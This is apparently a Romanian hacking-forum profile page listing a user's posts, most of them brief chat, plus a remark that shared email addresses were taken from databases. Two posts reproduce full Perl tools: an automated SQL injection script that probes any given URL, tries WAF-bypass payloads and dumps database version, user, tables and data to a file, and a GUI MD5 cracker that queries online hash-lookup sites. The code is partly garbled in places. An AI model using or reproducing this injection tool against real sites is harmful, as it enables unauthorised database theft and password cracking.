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About Romania-

  • Birthday 10/15/1996

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  1. cred ca o sa iei ban!
  2. Romania-


    Nu sunt mailuri de rahat ! sunt scoase din db's !
  3. Foarte frumos blog-ul ! Bravo tot asa.
  4. sursa : http://www.hackforums.net/showthread.php?tid=4347556 , e tot !
  5. Salut , eu cu inca un baiat ne-am gandit sa ne facem un canal de youtube Link-ul : https://www.youtube.com/channel/UCk34REjatw70hXzTvkwdn1Q Primul video : Astept parerii si sugestii .
  6. Postezi doar pentru +1 ? Ce daca e "Old" ? Isi face treaba !
  7. Nu am nevoie sa postez ceva la cereri , postez ca asa vreau
  8. #!usr/bin/perl# Automated SQL Injection tool by Red_Hat # Version: 2.0 # Injection Method:UNION Based & STRING based $starts=""; $ends=""; use LWP::Simple; print q{ ____ _ __ / _/___ (_)__ __/ /__ __ / // __ \ / / _ \/ ___/ __/ __ \/ ___/ _/ // / / __/ /__/ /_/ /_/ / / /___/_/ /_/_/ /\___/\___/\__/\____/_/ /___/ Automated SQL Injection tool by Red_Hat }; if (!defined($ARGV[0])){ print q{ Usage : ./injector.pl http://site.com/page.php?id=1 }; exit; } $site=$ARGV[0]; # Check URL. if ($site!~ m /http:/){ print "[!]Invalid URL.\n"; exit; } # URL valid. # Check if site exists. print "[+]Checking if '".$site."' exists...\n"; if (!head($site)){ print "[!]Site does not exist.\n"; exit; } # Site Exists # Check URL Vulnerability print "[+]Checking vulnerability of '".$site."'...\n"; $url=$site; $url=~ s/=/=2'/; #Check URL. if ($url eq $site){ print "[!]Invalid URL.\n"; exit; } # URL Valid. # Pentest URL. $pentest=get($url); $normal=get($site); if ($pentest=~ m /SQL/ or $pentest=~ m /sql_fetch_array()/ or $pentest=~ m /Warning/ or $pentest=~ m /Error:/){ print "[*]Site is vulnerable.\n"; } else{ $retry=get($site."'"); if ($retry=~ m /SQL/){ print "[*]Site is vulnerable.\n"; } else{ print "[!]Site is not vulnerable.\n"; exit; } } # URL Vulnerable. # Check attack Method print "[+]Checking attack method...\n"; $string=get($site."+order+by+red_hat--"); if ($string=~ m /column/ or $string=~ m /mysql_num_rows()/ or $string=~ m /Warning/ or $string=~ m/SQL/){ print "[+]Starting UNION based attack...\n"; } else{ print "[+]Starting STRING based attack...\n"; $starts="'"; $ends="+"; } # Method clear. # Column count. print "[+]Starting column count on '".$site."'...\n"; $column=1; $pentest=get($site.$starts." +order+by+".$column."--".$ends); while ($pentest!~ m /column/){ $column++; $pentest=get($site.$starts."+order+by+".$column."--".$ends); if ($pentest=~ m /Warning/ or $pentest=~ m /mysql_num_rows()/){ goto endwhileforcolumn; } } endwhileforcolumn: $column=$column-1; if ($column==0){ print "[!]Could not extract number of columns ...\n"; exit; } print "[*]Number of columns : ".$column."...\n"; # End count. # Extract vulnerable columns $union=1; $query="+and+0+union+select+concat(0x6c6f6c,1,0x6c6f6c)"; print "[+]Extracting vulnerable columns...\n"; while ($column > $union){ $union++; $query=$query.",concat(0x6c6f6c,$union,0x6c6f6c)"; } $query=$query."--"; $url=$site; $url=~ s/=/=-/; $pentest=get($url.$starts.$query.$ends); @get=split(/lol/,$pentest); $open="".$get[1].""; if ($open-1 < 1){ if ($pentest=~ /The used SELECT statements have a different number of columns/){ print "[!]Error : The used SELECT statements have a different number of columns...\n"; exit; } print "[!]Could not extract vulnerable column...\n"; print "[+]Attempting to bypass WAF...\n"; &method; if ($open-1 < 1){ print "[!]Could not bypass WAF and extract vulnerable columns...\n"; exit; } } print "[*]Injecting through column : ".$open."...\n"; # Columns extracted. # Generated counting string $union=1; $count="1"; while ($union < $column){ $union++; if ($union==$open){ $count=$count.",OPEN"; } else{ $count=$count.",".$union.""; } } # Counting string generated. # Extract version print "[+]Extracting database version...\n"; $query=$url.$starts."+uNiOn+SelECt+".$count."--".$ends; $query=~ s/OPEN/group_concat(0x6c6f6c,version(),0x6c6f6c)/; $pentest=get($query); @get=split(/lol/,$pentest); $version=$get[1]; print "[*]Database version extracted : ".$version."...\n"; # Version extracted. # Make sure version is high enough if ($pentest=~ m/lol4./){ print "[!]MySQL version is too low for a UNION based injection...\n"; exit; } # Version is high enough. # Extract user print "[+]Extracting database user...\n"; $query=$url.$starts."+uNioN+select+".$count."--".$ends; $query=~ s/OPEN/group_concat(0x6c6f6c,user(),0x6c6f6c)/; $pentest=get($query); @get=split(/lol/,$pentest); $user=$get[1]; print "[*]Database user extracted : ".$user."...\n"; # Dtabase user extracted. # Extract current database print "[+]Extracting current database...\n"; $query=$url.$starts."+UnIoN+select+".$count."--".$ends; $query=~ s/OPEN/group_concat(0x6c6f6c,database(),0x6c6f6c)/; $pentest=get($query); @get=split(/lol/,$pentest); $database=$get[1]; print "[*]Database extracted : ".$database."...\n"; # Database user extracted. # Extract tables print "[+]Extracting tables ...\n"; $query=$url.$starts."+uNiOn+select+".$count."+FROM+information_schema.tables+WHERE+table_schema=database()--".$ends; $query=~ s/OPEN/(concat(0x6c6f6c,group_concat(table_name),0x6c6f6c))/; $pentest=get($query); @get=split(/lol/,$pentest); @moREdata){ #!/usr/local/bin/perl open (DUMP, '>>$site.txt'); print DUMP $table_name.">".$col.">".$datapart.">"."'".$_."'\n"; close(DUMP); } } } } print "[*]Database dumped in '$site.txt'\n"; exit; # Dumped! sub method { # Generated counting string $union=1; $count="1"; while ($union < $column){ $union++; $count=$count.",".$union.""; } $change=0; while ($column > $change){ $change++; $query=$count; $query=~ s/$change,/group_concat(0x6c6f6c),/; $pentest=get($url."$starts+/**/uniUNIONon/*+dIstInct+*/selSELECTect/**/+".$query."--".$ends); if ($pentest=~ m/lol/){ $open=$change; return; } } # Counting string generated. } Source : http://www.hackforums.net/showthread.php?tid=3003669
  9. #!usr/bin/perl#MD5 Crack T00l © Doddy Hackman 2011 use Tk; use Tk::FileSelect; use Tk::PNG; use LWP::UserAgent; if ($^O eq 'MSWin32') { use Win32::Console; Win32::Console::Free(); } my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv: Gecko/20080201Firefox/"); $nave->timeout(5); my $logo = MainWindow->new(-background=>"black",-foreground=>"cyan"); $logo->title("MD5 Crack T00l"); $logo->geometry("700x300+20+20"); $logo->resizable(0,0); my $in = $logo->Photo(-file=>"total.png",-format=>"PNG"); $logo->Label(-image=>$in,-borderwidth=>0)->pack(); $logo->Label(-text=>"Options",-font=>"Impact1",-background=>"black",-foreground=>"cyan")->place(-x=>320,-y=>200); $logo->Button(-text=>"Crack HAsh",-width=>20,-command=>\&single,-background=>"black",-foreground=>"cyan",-activebackground=>"cyan")->place(-y=>250,-x=>70); $logo->Button(-text=>"Crack Wordlist",-width=>20,-command=>\&word,-background=>"black",-foreground=>"cyan",-activebackground=>"cyan")->place(-y=>250,-x=>210); $logo->Button(-text=>"About",-width=>20,-command=>\&abot,-background=>"black",-foreground=>"cyan",-activebackground=>"cyan")->place(-y=>250,-x=>350); $logo->Button(-text=>"Exit",-width=>20,-command=>\&chali,-background=>"black",-foreground=>"cyan",-activebackground=>"cyan")->place(-y=>250,-x=>490); MainLoop; sub abot { msg("About","Coded By Doddy H"); } sub chali {exit(1);} sub single { my $sin = MainWindow->new(-background=>"black"); $sin->title("MD5 Crack T00l © Doddy Hackman 2011"); $sin->geometry("650x80+20+20"); $sin->resizable(0,0); $sin->Label(-text=>"MD5 : ",-font=>"Impact1",-background=>"black",-foreground=>"cyan")->place(-x=>30,-y=>20); my $hash = $sin->Entry(-width=>32,-background=>"black",-foreground=>"cyan")->place(-y=>24,-x=>82); $sin->Label(-text=>"Result : ",-font=>"Impact1",-background=>"black",-foreground=>"cyan")->place(-x=>290,-y=>20); my $result = $sin->Entry(-width=>32,-background=>"black",-foreground=>"cyan")->place(-y=>24,-x=>350); $sin->Button(-text=>"Crack",-command=>\&cracksingle,-width=>12,-background=>"black",-foreground=>"cyan",-activebackground=>"cyan")->place(-y=>22,-x=>555); sub cracksingle { my $target = $hash->get(); chomp $target; if (ver_length($target)) { $re = crackit($target); if ($re ne "false01") { $result->configure (-text =>$re); } else { $result->configure (-text =>"Not Found"); } } else { msg("MD5 Crack T00l","Hash incorrect"); } } } sub word { my $more = MainWindow->new(-background=>"black",-foreground=>"cyan"); $more->title("MD5 Crack T00l © Doddy Hackman 2011"); $more->geometry("450x280+50+50"); $more->resizable(0,0); $more->Label(-text=>"File : ",-font=>"Impact1",-background=>"black",-foreground=>"cyan")->place(-y=>10,-x=>10); my $filex = $more->Entry(-width=>40,-background=>"black",-foreground=>"cyan")->place(-y=>13,-x=>50); $more->Button(-text=>"Crack",-width=>10,-command=>\&crackmulti,-background=>"black",-foreground=>"cyan",-activebackground=>"cyan")->place(-y=>12,-x=>300); $more->Button(-text=>"Browse",-width=>10,-command=>\&bro,-background=>"black",-foreground=>"cyan",-activebackground=>"cyan")->place(-x=>370,-y=>12); $more->Label(-text=>"MD5",-background=>"black",-foreground=>"cyan")->place(-y=>70,-x=>65); my $hashes = $more->Listbox(-width=>32,-background=>"black",-foreground=>"cyan")->place(-y=>100,-x=>20); $more->Label(-text=>"Result",-background=>"black",-foreground=>"cyan")->place(-y=>70,-x=>300); my $resultados = $more->Listbox(-width=>32,-background=>"black",-foreground=>"cyan")->place(-y=>100,-x=>230); sub bro { $more->update; $browse = $more->FileSelect(-directory => "/"); my $file = $browse->Show; $filex->configure (-text =>$file); } sub crackmulti { $hashes->delete(0.0,"end"); $resultados->delete(0.0,"end"); my $archivo = $filex->get(); open(FILE,$archivo); @leera) { chomp $poco; if (ver_length($poco)) { $hashes->insert("end",$poco); $re = crackit($poco); if ($re ne "false01") { $resultados->insert("end",$re); } else { $resultados->insert("end","Not Found"); } } } sub repes { foreach $test(@_) { push @limpio,$test unless $repe{$test}++; } return @limpio; } } } sub crackit { my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables'=>'{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex'=>'<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables'=>'{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables'=>'{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', 'regex' => qq(<\/div><div class="result">$_[0].+)<br\/>), }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables'=>'{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', 'regex' => qq(MD5 ðàñøèôðîâàí: <b>(.*)<\/b><br><form action=\"\">), } ); for my $data(keys %hash) { $logo->update; # if ($hash{$data}{tipo} eq "get") { $code = toma($data.$_[0]); if ($code=~/$hash{$data}{regex}/ig) { savefile("hashes-found.txt",$_[0].":".$1); return $1; } } else { $code = tomar($data,$hash{$data}{variables}); if ($code=~/$hash{$data}{regex}/ig) { savefile("hashes-found.txt",$_[0].":".$1); return $1; } } } return "false01"; } sub msg { my $color_fondo = "black"; #white my $color_letra = "cyan"; #black my ($titulo,$contenido) = @_; my $mensaje = MainWindow->new(-background=>$color_fondo,-foreground=>$color_letra);$mensaje->title($titulo); $mensaje->geometry("200x50+20+20"); $mensaje->resizable(0,0); $mensaje->Label(-text=>$contenido,-font=>"Impact1",-background=>$color_fondo,-foreground=>$color_letra)->place(-y=>15,-x=>20); } sub ver_length { return true if length($_[0]) == 32; } sub toma { return $nave->get($_[0])->content; } sub savefile { open (SAVE,">>logs/".$_[0]); print SAVE $_[1]."\n"; close SAVE; } sub tomar { my ($web,$var) = @_; return $nave->post($web,[%{$var}])->content; } # ¿ The End ? Source : http://www.hackforums.net/showthread.php?tid=3249649
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